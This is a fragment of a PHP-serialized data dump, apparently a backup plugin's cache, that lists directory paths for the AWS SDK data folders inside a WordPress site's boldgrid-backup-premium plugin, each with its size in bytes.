ackup-premium/vendor/aws/aws-sdk-php/src/data/datasync\";i:42577;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01\";i:13774;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mobile\";i:13774;s:134:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar-notifications/2019-10-15\";i:17399;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar-notifications\";i:17399;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/config/2014-11-12\";i:127160;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/config\";i:127160;s:127:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01\";i:46883;s:116:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/route53resolver\";i:46883;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.lex/2016-11-28\";i:19458;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.lex\";i:19458;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/acm/2015-12-08\";i:24155;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/acm\";i:24155;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediapackage-vod/2018-11-07\";i:35207;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediapackage-vod\";i:35207;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/location/2020-11-19\";i:54081;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/location\";i:54081;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sts/2011-06-15\";i:15318;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sts\";i:15318;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/textract/2018-06-27\";i:16408;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/textract\";i:16408;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28\";i:71340;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/organizations\";i:71340;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18\";i:79003;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/opsworks\";i:79003;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16\";i:82954;s:103:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ds\";i:82954;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31\";i:36278;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sns\";i:36278;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26\";i:148728;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/securityhub\";i:148728;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ebs/2019-11-02\";i:15366;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ebs\";i:15366;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigatewayv2/2018-11-29\";i:152731;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigatewayv2\";i:152731;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/comprehend/2017-11-27\";i:85965;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/comprehend\";i:85965;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12\";i:46232;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/network-firewall\";i:46232;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05\";i:25685;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sqs\";i:25685;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23\";i:16835;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloud9\";i:16835;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13\";i:4621;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker\";i:4621;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01\";i:49328;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/monitoring\";i:49328;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30\";i:24380;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesisvideo\";i:24380;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15\";i:5697;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pricing\";i:5697;s:130:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14\";i:20491;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iot1click-projects\";i:20491;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/medialive/2017-10-14\";i:243438;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/medialive\";i:243438;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01\";i:76976;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/autoscaling\";i:76976;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27\";i:54635;s:103:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mq\";i:54635;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05\";i:50405;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/networkmanager\";i:50405;s:130:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05\";i:8512;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling\";i:8512;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28\";i:88027;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/guardduty\";i:88027;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25\";i:36526;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dataexchange\";i:36526;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeguruprofiler/2019-07-18\";i:38331;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codeguruprofiler\";i:38331;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24\";i:28893;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/service-quotas\";i:28893;s:131:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/marketplace-catalog/2018-09-17\";i:13361;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/marketplace-catalog\";i:13361;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/greengrass/2017-06-07\";i:101484;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/greengrass\";i:101484;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30\";i:34187;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ecr-public\";i:34187;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25\";i:9811;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elastic-inference\";i:9811;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/worklink/2018-09-25\";i:37411;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/worklink\";i:37411;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02\";i:122221;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticache\";i:122221;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/managedblockchain/2018-09-24\";i:40536;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/managedblockchain\";i:40536;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26\";i:12280;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/detective\";i:12280;s:132:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing/2012-06-01\";i:42315;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elasticloadbalancing\";i:42315;s:125:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25\";i:62431;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/directconnect\";i:62431;s:135:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi/2018-11-29\";i:3808;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigatewaymanagementapi\";i:3808;s:130:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connectparticipant/2018-09-07\";i:14560;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connectparticipant\";i:14560;s:140:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01\";i:5434;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics\";i:5434;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cognito-idp/2016-04-18\";i:152337;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cognito-idp\";i:152337;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14\";i:39159;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kinesisanalytics\";i:39159;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03\";i:12832;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/outposts\";i:12832;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/devicefarm/2015-06-23\";i:91516;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/devicefarm\";i:91516;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/fms/2018-01-01\";i:37031;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/fms\";i:37031;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31\";i:25940;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mgh\";i:25940;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/timestream-query/2018-11-01\";i:7245;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/timestream-query\";i:7245;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09\";i:41318;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appconfig\";i:41318;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23\";i:11890;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/mediatailor\";i:11890;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/amp/2020-08-01\";i:10182;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/amp\";i:10182;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigateway/2015-07-09\";i:129719;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/apigateway\";i:129719;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/waf-regional/2016-11-28\";i:94807;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/waf-regional\";i:94807;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/swf/2012-01-25\";i:77176;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/swf\";i:77176;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24\";i:49099;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/sms\";i:49099;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appflow/2020-08-23\";i:59649;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appflow\";i:59649;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codepipeline/2015-07-09\";i:66381;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codepipeline\";i:66381;s:128:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/timestream-write/2018-11-01\";i:18993;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/timestream-write\";i:18993;s:117:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/wafv2/2019-07-29\";i:62746;s:106:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/wafv2\";i:62746;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30\";i:27389;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/snowball\";i:27389;s:135:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace/2017-01-11\";i:3390;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/entitlement.marketplace\";i:3390;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar/2017-04-19\";i:24576;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codestar\";i:24576;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/workspaces/2015-04-08\";i:63097;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/workspaces\";i:63097;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/macie2/2020-01-01\";i:103255;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/macie2\";i:103255;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31\";i:230202;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01\";i:85216;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rds\";i:315418;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22\";i:70528;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotwireless\";i:70528;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/comprehendmedical/2018-10-30\";i:30305;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/comprehendmedical\";i:30305;s:132:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02\";i:2888;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect\";i:2888;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04\";i:38793;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/ram\";i:38793;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29\";i:24288;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/datapipeline\";i:24288;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codecommit/2015-04-13\";i:163153;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/codecommit\";i:163153;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appmesh/2018-10-01\";i:31977;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25\";i:91425;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/appmesh\";i:123402;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07\";i:23596;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2\";i:23596;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12\";i:19309;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/dlm\";i:19309;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06\";i:41182;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotthingsgraph\";i:41182;s:119:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/support/2013-04-15\";i:21132;s:108:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/support\";i:21132;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30\";i:20147;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudhsm\";i:20147;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain/2013-01-01\";i:8078;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain\";i:8078;s:129:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elastictranscoder/2012-09-25\";i:39358;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/elastictranscoder\";i:39358;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01\";i:13354;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rds-data\";i:13354;s:132:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connect-contact-lens/2020-08-21\";i:6416;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/connect-contact-lens\";i:6416;s:123:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27\";i:84286;s:112:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/rekognition\";i:84286;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02\";i:85520;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/imagebuilder\";i:85520;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26\";i:55426;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pinpoint-email\";i:55426;s:118:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/events/2015-10-07\";i:69584;s:107:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/events\";i:69584;s:120:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25\";i:53017;s:109:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/databrew\";i:53017;s:122:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25\";i:5955;s:111:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/s3outposts\";i:5955;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27\";i:35438;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/iotevents\";i:35438;s:126:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15\";i:33194;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/route53domains\";i:33194;s:115:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01\";i:56044;s:104:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/kms\";i:56044;s:124:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30\";i:42572;s:113:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/greengrassv2\";i:42572;s:114:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27\";i:6344;s:103:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/pi\";i:6344;s:121:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vendor/aws/aws-sdk-php/src/data/honeycode/2020-03-01\";i:28921;s:110:\"/home/eckank5/public_html/wp-content/plugins/boldgrid-backup-premium/vend